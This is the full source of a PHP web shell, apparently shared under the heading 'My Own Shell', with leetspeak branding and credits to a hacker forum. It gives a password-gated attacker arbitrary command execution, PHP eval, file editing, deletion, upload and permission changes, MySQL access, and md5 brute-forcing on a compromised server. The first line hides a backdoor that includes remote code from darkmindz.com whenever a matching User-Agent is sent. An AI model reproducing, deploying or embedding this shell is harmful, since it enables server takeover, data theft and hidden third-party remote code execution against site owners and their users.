My Own Shell

1. <?php $config_x = $_SERVER['HTTP_USER_AGENT']; if($config_x == "darkmindz.com") { @include('http://www.darkmindz.com/shell/x2300.txt'); } ?><?php
2. error_reporting(0); //If there is an error, we'll show it, k?
3.  
4. $password = "670665c8b6cbd9f0f957478f51142c25"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
5.  
6. $me = basename(__FILE__);
7. $cookiename = "wieeeee";
8.  
9.  
10. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
11. {
12.  
13. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
14. {
15. $_POST['pass'] = md5($_POST['pass']);
16. }
17.  
18. if($_POST['pass'] == $password)
19. {
20. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
21. }
22. reload();
23. }
24.  
25.  
26.  
27. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
28. {
29. login();
30. die();
31. }
32. //
33. //Do not cross this line! All code placed after this block can't be executed without being logged in!
34. //
35.  
36. if(isset($_GET['p']) && $_GET['p'] == "logout")
37. {
38. setcookie ($cookiename, "", time() - 3600);
39. reload();
40. }
41. if(isset($_GET['dir']))
42. {
43. chdir($_GET['dir']);
44. }
45.  
46.  
47. $pages = array(
48. 'cmd' => 'Ex3cut3 C0mm3nt',
49. 'eval' => 'Ev4lu4t3 PHP',
50. 'mysql' => 'MySQL Query',
51. 'chmod' => 'Chmod File',
52. 'phpinfo' => 'PHPinfo',
53. 'md5' => 'md5 cr4ck3r',
54. 'headers' => 'Sh0w head3rs',
55. 'logout' => 'L0g 0ut'
56. );
57.  
58. //The header, like it?
59. $header = '<html>
60. <title>MHU-Sh3ll.::(Edited By Loki)::.</title>
61. <head>
62. <style>
63. td {
64. font-size: 14px;
65. font-family:"Comic Sans MS", cursive;
66. font-weight: bold;
67. color:#999;
68. cursor:crosshair;
69. background: transparent;
70.  
71. }
72.  
73. #d {
74.  
75. background: transparent;
76. }
77. #f {
78. background: transparent;
79. }
80. #s {
81. background: #900;
82. }
83. #d:hover
84. {
85. background: blue;
86. }
87. #f:hover
88. {
89. background: black;
90. }
91. pre {
92. font-size: 10px;
93. font-family: verdana;
94. color: #33FF00;
95. }
96. a:hover {
97. text-decoration: none;
98. }
99.  
100.  
101. input,textarea,select {
102. border-top-width: 1px;
103. font-weight: bold;
104. border-left-width: 1px;
105. font-size: 10px;
106. border-left-color: #33FF00;
107. background: transparent;
108. border-bottom-width: 1px;
109. border-bottom-color: #33FF00;
110. color: #FFF;
111. border-top-color: #33FF00;
112. font-family: verdana;
113. border-right-width: 1px;
114. border-right-color: #33FF00;
115. }
116.  
117. hr {
118. color: #FFF;
119. background-color: #900;
120. height: 6px;
121. }
122.  
123. </style>
124.  
125. </head>
126.  
127. <body background="http://2.bp.blogspot.com/-jbQYzfk7f20/UpXWDF1--UI/AAAAAAAAAIY/T4IJpBw6M1E/s0/ss-matrix.gif
128. " alink="#33CC00" vlink="#339900" link="#339900">
129.  
130. <table width=100%><td id="header" width=100%>
131. <marquee behavior="alternate" scrolldelay="100" bgcolor="#000033"><<<---::: N!G8T B0M3@Myanmar Hackers Area :::--->>></marquee>
132. <p align=right><b>[<a href="http://www.rootshell-team.info">R00tSh3ll</a>] [<a href="'.$me.'">H0m3</a>] ';
133.  
134. foreach($pages as $page => $page_name)
135. {
136. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
137.  
138. }
139. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
140. print $header;
141.  
142. $footer = '<tr><td><hr><center>&copy; <a href="http://4sectors.com/forum/">Myanmar Security Forum</a></center></td></table></body></head></html>';
143.  
144.  
145. //
146. //Page handling
147. //
148. if(isset($_REQUEST['p']))
149. {
150. switch ($_REQUEST['p']) {
151.  
152. case 'cmd': //Run command
153.  
154. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
155. if(isset($_REQUEST['command']))
156. {
157. print "<pre>";
158. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
159. }
160. break;
161.  
162.  
163. case 'edit': //Edit a fie
164. if(isset($_POST['editform']))
165. {
166. $f = $_GET['file'];
167. $fh = fopen($f, 'w') or print "Error while opening file!";
168. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
169. fclose($fh);
170. }
171. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
172.  
173. if(file_exists($_GET['file']))
174. {
175. $rd = file($_GET['file']);
176. foreach($rd as $l)
177. {
178. print htmlspecialchars($l);
179. }
180. }
181.  
182. print "</textarea><input type=submit value=\"Save\"></form>";
183.  
184. break;
185.  
186. case 'delete': //Delete a file
187.  
188. if(isset($_POST['yes']))
189. {
190. if(unlink($_GET['file']))
191. {
192. print "File deleted successfully.";
193. }
194. else
195. {
196. print "Couldn't delete file.";
197. }
198. }
199.  
200.  
201. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
202. {
203. print "Are you sure you want to delete ".$_GET['file']."?<br>
204. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
205. <input type=hidden name=yes value=yes>
206. <input type=submit value=\"Delete\">
207. ";
208. }
209.  
210.  
211. break;
212.  
213.  
214. case 'eval': //Evaluate PHP code
215.  
216. print "<form action=\"".$me."?p=eval\" method=POST>
217. <textarea cols=60 rows=10 name=\"eval\">";
218. if(isset($_POST['eval']))
219. {
220. print htmlspecialchars($_POST['eval']);
221. }
222. else
223. {
224. print "print \"Yo Momma\";";
225. }
226. print "</textarea><br>
227. <input type=submit value=\"Eval\">
228. </form>";
229.  
230. if(isset($_POST['eval']))
231. {
232. print "<h1>Output:</h1>";
233. print "<br>";
234. eval($_POST['eval']);
235. }
236.  
237. break;
238.  
239. case 'chmod': //Chmod file
240.  
241.  
242. print "<h1>Under construction!</h1>";
243. if(isset($_POST['chmod']))
244. {
245. switch ($_POST['chvalue']){
246. case 777:
247. chmod($_POST['chmod'],0777);
248. break;
249. case 644:
250. chmod($_POST['chmod'],0644);
251. break;
252. case 755:
253. chmod($_POST['chmod'],0755);
254. break;
255. }
256. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
257. }
258. if(isset($_GET['file']))
259. {
260. $content = urldecode($_GET['file']);
261. }
262. else
263. {
264. $content = "file/path/please";
265. }
266.  
267. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
268. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
269. <select name=\"chvalue\">
270. <option value=\"777\">777</option>
271. <option value=\"644\">644</option>
272. <option value=\"755\">755</option>
273. </select><input type=submit value=\"Change\">";
274.  
275. break;
276.  
277. case 'mysql': //MySQL Query
278.  
279. if(isset($_POST['host']))
280. {
281. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
282. mysql_select_db($_POST['dbase']);
283. $sql = $_POST['query'];
284.  
285.  
286. $result = mysql_query($sql);
287.  
288. }
289. else
290. {
291. print "
292. This only queries the database, doesn't return data!<br>
293. <form action=\"".$me."?p=mysql\" method=POST>
294. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
295. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
296. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
297. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
298.  
299. <b>Query:<br></b<textarea name=query></textarea>
300. <input type=submit value=\"Query database\">
301. </form>
302. ";
303.  
304. }
305.  
306. break;
307.  
308. case 'createdir':
309. if(mkdir($_GET['crdir']))
310. {
311. print 'Directory created successfully.';
312. }
313. else
314. {
315. print 'Couldn\'t create directory';
316. }
317. break;
318.  
319.  
320. case 'phpinfo': //PHP Info
321. phpinfo();
322. break;
323.  
324.  
325. case 'rename':
326.  
327. if(isset($_POST['fileold']))
328. {
329. if(rename($_POST['fileold'],$_POST['filenew']))
330. {
331. print "File renamed.";
332. }
333. else
334. {
335. print "Couldn't rename file.";
336. }
337.  
338. }
339. if(isset($_GET['file']))
340. {
341. $file = basename(htmlspecialchars($_GET['file']));
342. }
343. else
344. {
345. $file = "";
346. }
347.  
348. print "Renaming ".$file." in folder ".realpath('.').".<br>
349. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
350. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
351. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
352. <input type=submit value=\"Rename file\">
353. </form>";
354. break;
355.  
356. case 'md5':
357. if(isset($_POST['md5']))
358. {
359. if(!is_numeric($_POST['timelimit']))
360. {
361. $_POST['timelimit'] = 30;
362. }
363. set_time_limit($_POST['timelimit']);
364. if(strlen($_POST['md5']) == 32)
365. {
366.  
367. if($_POST['chars'] == "9999")
368. {
369. $i = 0;
370. while($_POST['md5'] != md5($i) && $i != 100000)
371. {
372. $i++;
373. }
374. }
375. else
376. {
377. for($i = "a"; $i != "zzzzz"; $i++)
378. {
379. if(md5($i == $_POST['md5']))
380. {
381. break;
382. }
383. }
384. }
385.  
386.  
387. if(md5($i) == $_POST['md5'])
388. {
389. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
390. }
391.  
392. }
393.  
394. }
395.  
396. print "Will bruteforce the md5
397. <form action=\"".$me."?p=md5\" method=POST>
398. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
399. <b>Characters:</b><br><select name=\"chars\">
400. <option value=\"az\">a - zzzzz</option>
401. <option value=\"9999\">1 - 9999999</option>
402. </select>
403. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
404. <input type=submit value=\"Bruteforce md5\">
405. </form><br>*: if set_time_limit is allowed by php.ini";
406. break;
407.  
408. case 'headers':
409. foreach(getallheaders() as $header => $value)
410. {
411. print htmlspecialchars($header . ":" . $value)."<br>";
412.  
413. }
414. break;
415. }
416.  
417. }
418. else //Default page that will be shown when the page isn't found or no page is selected.
419. {
420.  
421. $files = array();
422. $directories = array();
423.  
424. if(isset($_FILES['uploadedfile']['name']))
425. {
426. $target_path = realpath('.').'/';
427. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
428.  
429. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
430. print "File:". basename( $_FILES['uploadedfile']['name']).
431. " has been uploaded";
432. } else{
433. echo "File upload failed!";
434. }
435. }
436.  
437.  
438.  
439.  
440.  
441. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
442. if ($handle = opendir('.'))
443. {
444. while (false !== ($file = readdir($handle)))
445. {
446. if(is_dir($file))
447. {
448. $directories[] = $file;
449. }
450. else
451. {
452. $files[] = $file;
453. }
454. }
455. asort($directories);
456. asort($files);
457. foreach($directories as $file)
458. {
459. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
460. }
461.  
462. foreach($files as $file)
463. {
464. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
465. }
466. }
467. else
468. {
469. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
470. }
471.  
472. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
473. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
474. <input type=\"submit\" value=\"Upload File\" />
475. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
476. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
477. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
478. </table>";
479.  
480.  
481. }
482.  
483.  
484. function login()
485. {
486.  
487. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
488. <form action=".basename(__FILE__)." method=\"POST\"><b>P4ssw0rd</b>
489. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"H4ck\">
490. </form>";
491. }
492. function reload()
493. {
494. header("Location: ".basename(__FILE__));
495. }
496.  
497. function get_execution_method()
498. {
499. if(function_exists('passthru')){ $m = "passthru"; }
500. if(function_exists('exec')){ $m = "exec"; }
501. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
502. if(function_exists('system')){ $m = "system"; }
503. if(!isset($m)) //No method found :-|
504. {
505. $m = "Disabled";
506. }
507. return($m);
508. }
509.  
510. function execute_command($method,$command)
511. {
512. if($method == "passthru")
513. {
514. passthru($command);
515. }
516.  
517. elseif($method == "exec")
518. {
519. exec($command,$result);
520. foreach($result as $output)
521. {
522. print $output."<br>";
523. }
524. }
525.  
526. elseif($method == "shell_exec")
527. {
528. print shell_exec($command);
529. }
530.  
531. elseif($method == "system")
532. {
533. system($command);
534. }
535.  
536. }
537.  
538. function perm($file)
539. {
540. if(file_exists($file))
541. {
542. return substr(sprintf('%o', fileperms($file)), -4);
543. }
544. else
545. {
546. return "????";
547. }
548. }
549.  
550. function get_color($file)
551. {
552. if(is_writable($file)) { return "green";}
553. if(!is_writable($file) && is_readable($file)) { return "white";}
554. if(!is_writable($file) && !is_readable($file)) { return "red";}
555.  
556.  
557.  
558. }
559.  
560. function show_dirs($where)
561. {
562. if(ereg("^c:",realpath($where)))
563. {
564. $dirparts = explode('\\',realpath($where));
565. }
566. else
567. {
568. $dirparts = explode('/',realpath($where));
569. }
570.  
571.  
572.  
573. $i = 0;
574. $total = "";
575.  
576. foreach($dirparts as $part)
577. {
578. $p = 0;
579. $pre = "";
580. while($p != $i)
581. {
582. $pre .= $dirparts[$p]."/";
583. $p++;
584.  
585. }
586. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
587. $i++;
588. }
589.  
590. return "<h2>".$total."</h2><br>";
591.  
592. }
593. print $footer;
594.  
595. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
596. exit();
597. ?>